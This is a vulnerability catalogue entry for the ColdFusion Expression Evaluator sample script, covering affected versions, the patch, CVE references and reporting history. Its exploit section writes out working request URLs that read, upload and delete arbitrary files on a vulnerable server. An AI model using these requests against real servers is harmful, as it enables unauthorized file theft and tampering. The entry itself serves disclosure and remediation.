ColdFusionEvaluator

Vulnerability Description

Brief description: ColdFusion Expression Evaluator eoes not check for shell metacharacters

Full description: The Expression Evaluator is a sample script included with ColdFusion (through version 4.0) to demonstrate to users how to use the expression evaluation features of ColdFusion. This script allows one to save and reload files of expressions for evaluation. But it does not check that the file loaded is the file that was saved, so an attacker can specify any file on the system that the web server can reach. Thus, an attacker can read, create, and write any such file.

Components: ColdFusion Application Server 2.0, 3.0, 3.1; ColdFusion Server 4.0; not vulnerable: ColdFusion Server 4.1

Systems:

Effect(s) of exploiting: The remote user can create, alter, and delete any file on the system available to the web server.

Detecting the hole:

    1. Check the version of the ColdFusion server.

Fixing the hole:

    1. Install the Cold Fusion 4.0.1 Update from the Allaire web site.
    2. Patch your ColdFusion web server using the appropriate patch from Allaire .

Other information:

Keywords

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: CAN-1999-0455 -- The Expression Evaluator sample application in ColdFusion allows remote attackers to read or delete files on the server via exprcalc.cfm, which does not restrict access to the server properly.

CVE Number: CAN-1999-0477 -- The Expression Evaluator in the ColdFusion Application Server allows a remote attacker to upload files to the server via openfile.cfm, which does not restrict access to the server properly.

Exploit Information

Attack: To upload a file, issue the following command: 

http://targethost/cfdocs/expeval/openfile.cfm?OpenFilePath=c:\dumphere.txt
To read a file, issue the following command: 
http://targethost/cfdocs/expeval/displayopenedfile.cfm?OpenFilePath=c:\getfromhere.txt
To display a file's contents in a web form, and then delete it, use 
http://targethost/cfdocs/expeval/openfile.cfm?OpenFilePath=c:\getfromhere.txt

To browse the system, don't specify where your file is to be put, but have openfile.cfm handle it.

http://targethost/cfdocs/expeval/openfile.cfm
and submit your file. You will be sent to the web page: http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt . Replace .\myfile.txt with ExprCalc.cfm . Then go to that page. This deletes the ExprCalc.cfm file and allows you to upload files without them being deleted.

Related Information

Advisories: The l0pht's original ColdFusion advisory ; Phrack's excellent article ; Allaire's security bulletin ASB99-01, Expression Evaluator Security Issues ; ISS X-Force's database entry coldfusion-expression-evaluator ; Security Focus' database entry 115

Related Vulnerabilities:

Reportage

Reporting: Rain Forest Puppy in Phrack 54(8) (Dec. 25, 1998 )

Reporting: L0pht in http://www.l0pht.com/advisories/cfusion.txt (April 20th, 1999 )

Revision Number 1

  1. Stacey Anderson (7/2/2000):